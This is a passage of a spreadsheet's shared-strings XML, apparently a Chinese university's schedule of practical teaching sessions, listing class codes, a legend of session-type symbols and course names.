      <t xml:space="preserve">)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">182281</t>
  </si>
  <si>
    <t xml:space="preserve">220</t>
  </si>
  <si>
    <t xml:space="preserve">会计学（中外合作）</t>
  </si>
  <si>
    <t xml:space="preserve">182291</t>
  </si>
  <si>
    <t xml:space="preserve">182292</t>
  </si>
  <si>
    <t xml:space="preserve">182293</t>
  </si>
  <si>
    <t xml:space="preserve">192211</t>
  </si>
  <si>
    <t xml:space="preserve">192212</t>
  </si>
  <si>
    <t xml:space="preserve">192213</t>
  </si>
  <si>
    <t xml:space="preserve">192214</t>
  </si>
  <si>
    <t xml:space="preserve">192251</t>
  </si>
  <si>
    <t xml:space="preserve">192252</t>
  </si>
  <si>
    <t xml:space="preserve">192271</t>
  </si>
  <si>
    <t xml:space="preserve">192281</t>
  </si>
  <si>
    <t xml:space="preserve">192291</t>
  </si>
  <si>
    <t xml:space="preserve">192292</t>
  </si>
  <si>
    <t xml:space="preserve">192293</t>
  </si>
  <si>
    <t xml:space="preserve">192294</t>
  </si>
  <si>
    <t xml:space="preserve">202211</t>
  </si>
  <si>
    <t xml:space="preserve">202212</t>
  </si>
  <si>
    <t xml:space="preserve">202213</t>
  </si>
  <si>
    <t xml:space="preserve">202214</t>
  </si>
  <si>
    <t xml:space="preserve">49A575F20F7B482C9ACD334EFF184A89</t>
  </si>
  <si>
    <t xml:space="preserve">网络工程（中外合作））</t>
  </si>
  <si>
    <t xml:space="preserve">202241</t>
  </si>
  <si>
    <t xml:space="preserve">202242</t>
  </si>
  <si>
    <t xml:space="preserve">202243</t>
  </si>
  <si>
    <t xml:space="preserve">202271</t>
  </si>
  <si>
    <t xml:space="preserve">202281</t>
  </si>
  <si>
    <t xml:space="preserve">202291</t>
  </si>
  <si>
    <t xml:space="preserve">202292</t>
  </si>
  <si>
    <t xml:space="preserve">202293</t>
  </si>
  <si>
    <t xml:space="preserve">212211</t>
  </si>
  <si>
    <t xml:space="preserve">212212</t>
  </si>
  <si>
    <t xml:space="preserve">212213</t>
  </si>
  <si>
    <t xml:space="preserve">212214</t>
  </si>
  <si>
    <t xml:space="preserve">212241</t>
  </si>
  <si>
    <t xml:space="preserve">212242</t>
  </si>
  <si>
    <t xml:space="preserve">212243</t>
  </si>
  <si>
    <t xml:space="preserve">212271</t>
  </si>
  <si>
    <t xml:space="preserve">212281</t>
  </si>
  <si>
    <t xml:space="preserve">212291</t>
  </si>
  <si>
    <t xml:space="preserve">212292</t>
  </si>
  <si>
    <t xml:space="preserve">212293</t>
  </si>
  <si>
    <t xml:space="preserve">备注</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">符号说明：  
□ 理论课    </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"># </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">毕业设计   ∈专业课设     </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Ω</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">专业实践     ※ 技能训练     </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">S</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">计算实习      ⊙ 科 训       ★专业实习     </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Z </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电子实习   </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">G</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电工实习    </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">//</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">生产实习     </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">R</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">认知实习       ∝创新实践         </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">F</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">航模设计       </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">E</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">英语训练     〓实训        </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">W</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">学年论文    </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">R</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">认知实习    △专业考察      </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">/ </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">金工实习      </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">L</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">测量实习      ∷ 考试        </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">C</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">机器测绘      </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">///</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">毕业实习       </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">*</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">社会调查    ▼模拟法庭   </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">J</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">毕业答辩     </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">E</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">强化训练     ◎综合程序课程设计     ◆计算机软件应用实践   ♀网络工程实践 　</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">§</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">发动机装配修理     ♂会计综合模拟      ■飞行技术模拟训练              ﹌ 手绘         </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">S </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">飞机辅助设计 －机原、机零　　</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Y</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">艺术实践　　</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">C</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">机器测绘   </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">M</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">模具测绘  </t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">D</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电子课设 
特殊说明：</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">、所有分散进行的实践环节没有体现出来，由学院自己掌握。  
</t>
    </r>
    <r>
      <rPr>
        <b val="true"/>
        <sz val="8.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8.5"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
       </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">年级</t>
  </si>
  <si>
    <t xml:space="preserve">学院</t>
  </si>
  <si>
    <t xml:space="preserve">班级</t>
  </si>
  <si>
    <t xml:space="preserve">课程</t>
  </si>
  <si>
    <t xml:space="preserve">周数</t>
  </si>
  <si>
    <t xml:space="preserve">学分</t>
  </si>
  <si>
    <t xml:space="preserve">类型符号</t>
  </si>
  <si>
    <t xml:space="preserve">类型</t>
  </si>
  <si>
    <t xml:space="preserve">开课学院</t>
  </si>
  <si>
    <t xml:space="preserve">专业课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">专业课设</t>
  </si>
  <si>
    <t xml:space="preserve">毕业设计（论文）</t>
  </si>
  <si>
    <t xml:space="preserve">毕业设计</t>
  </si>
  <si>
    <t xml:space="preserve">毕业实习</t>
  </si>
  <si>
    <t xml:space="preserve">专业技能训练</t>
  </si>
  <si>
    <t xml:space="preserve">技能训练</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电子工艺技术实训</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">B</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">电子实习</t>
  </si>
  <si>
    <t xml:space="preserve">工程训练中心</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">机械设计基础课程设计</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">B</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">机原、机零</t>
  </si>
  <si>
    <t xml:space="preserve">毕业实习（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">无损检测工程实践与设计</t>
  </si>
  <si>
    <t xml:space="preserve">专业实践</t>
  </si>
  <si>
    <t xml:space="preserve">无损检测专业课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">无损检测工程实践与设计应用（校企）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">无损检测职业资格</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">中级</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">)</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">培训实践（校企）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">无损检测专业课程设计及工程实践（校企）</t>
  </si>
  <si>
    <t xml:space="preserve">测控系统综合设计</t>
  </si>
  <si>
    <t xml:space="preserve">单片机接口实践</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">无损检测工程实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">企业</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">电子技术课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电工实习</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">A</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">电工实习</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">工程认识训练</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">A</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">◇</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">基础制造训练</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">B</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">飞行器工程学院</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">航空发动机学院</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">飞行器设计课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">机械设计基础课程设计</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">A</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">大气污染控制工程课程设计（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">水污染控制工程课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">软件综合课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">科训</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">工商管理</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">中外合作</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">ERP</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">沙盘模拟</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">会计综合模拟</t>
  </si>
  <si>
    <t xml:space="preserve">企业经营决策模拟</t>
  </si>
  <si>
    <t xml:space="preserve">机电一体化系统课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">机械</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">CAD/CAE</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">课程设计</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">机械制造工艺设备课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">数控加工实训</t>
  </si>
  <si>
    <t xml:space="preserve">实训</t>
  </si>
  <si>
    <t xml:space="preserve">专业综合实践</t>
  </si>
  <si>
    <t xml:space="preserve">模具测绘与制造</t>
  </si>
  <si>
    <t xml:space="preserve">模具测绘</t>
  </si>
  <si>
    <t xml:space="preserve">成型工艺设计（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">顶岗实习（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">专业实习</t>
  </si>
  <si>
    <t xml:space="preserve">专业技能训练（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">焊接工装课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">焊机设计与故障诊断实践（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">焊接工艺设计及评定工程实践（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">焊接工装课程设计（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">电子器件组件结构设计课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">机电一体化系统设计</t>
  </si>
  <si>
    <t xml:space="preserve">机械设计课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">焊接质量及生产管理工程实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">实践教学环节</t>
  </si>
  <si>
    <t xml:space="preserve">微机原理课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">电工实习</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">B</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">焊接专业认知实习（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">认知实习</t>
  </si>
  <si>
    <t xml:space="preserve">专业认知实践</t>
  </si>
  <si>
    <t xml:space="preserve">固体废物处理与处置课程设计（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">环境影响评价课程设计（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">毕业设计（论文）（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">水污染控制工程课程设计（企业）</t>
  </si>
  <si>
    <t xml:space="preserve">建筑给水排水工程课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">污水处理厂课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">化工原理课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">应用化学虚拟仿真实训</t>
  </si>
  <si>
    <t xml:space="preserve">专业研究实践</t>
  </si>
  <si>
    <t xml:space="preserve">航空工业废水仿真实验与实训</t>
  </si>
  <si>
    <t xml:space="preserve">取水工程课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">水泵站课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">专业综合课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">综合程序课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">工商管理综合运营课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">管理信息系统综合课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">电子商务网站运营与管理实践</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">专业基础课程设计</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">销售实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">基础工业工程课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">生产计划与控制课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">专业实训</t>
  </si>
  <si>
    <t xml:space="preserve">感知层编程课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">大数据分析课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">面向对象课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">机载软件认知实习</t>
  </si>
  <si>
    <t xml:space="preserve">商业银行业务模拟</t>
  </si>
  <si>
    <t xml:space="preserve">体育类活动组织与管理实践</t>
  </si>
  <si>
    <t xml:space="preserve">专业实践活动</t>
  </si>
  <si>
    <t xml:space="preserve">初级飞行模拟训练</t>
  </si>
  <si>
    <t xml:space="preserve">飞行技术模拟训练</t>
  </si>
  <si>
    <t xml:space="preserve">钢结构课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">基坑支护设计</t>
  </si>
  <si>
    <t xml:space="preserve">工程管理综合性实验</t>
  </si>
  <si>
    <t xml:space="preserve">土木工程概预算课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">土木工程综合实验</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">土木工程综合实验</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">[</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">实验学时</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">工程估价</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">A</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">课程设计</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">工程结构课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">工程经济学课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">交通规划课程设计</t>
  </si>
  <si>
    <t xml:space="preserve">路基路面课程设计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">房屋建筑学</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">A</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">课程设计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">房屋建筑学</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">B</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">课程设计</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">综合测量实习</t>
  </si>
  <si>
    <t xml:space="preserve">测量实习</t>
  </si>
  <si>
    <t xml:space="preserve">科研英语翻译技能训练</t>
  </si>
  <si>
    <t xml:space="preserve">E</t>
  </si>
  <si>
    <t xml:space="preserve">英语训练</t>
  </si>
  <si>
    <t xml:space="preserve">外贸流程实训</t>
  </si>
  <si>
    <t xml:space="preserve">法语影视欣赏</t>
  </si>
  <si>
    <t xml:space="preserve">创意写作坊</t>
  </si>
  <si>
    <t xml:space="preserve">行政能力与行政素质训练</t>
  </si>
  <si>
    <t xml:space="preserve">学年论文</t>
  </si>
  <si>
    <t xml:space="preserve">专业社会调查</t>
  </si>
  <si>
    <t xml:space="preserve">社会调查</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">播音与主持实践</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">5</t>
    </r>
  </si>
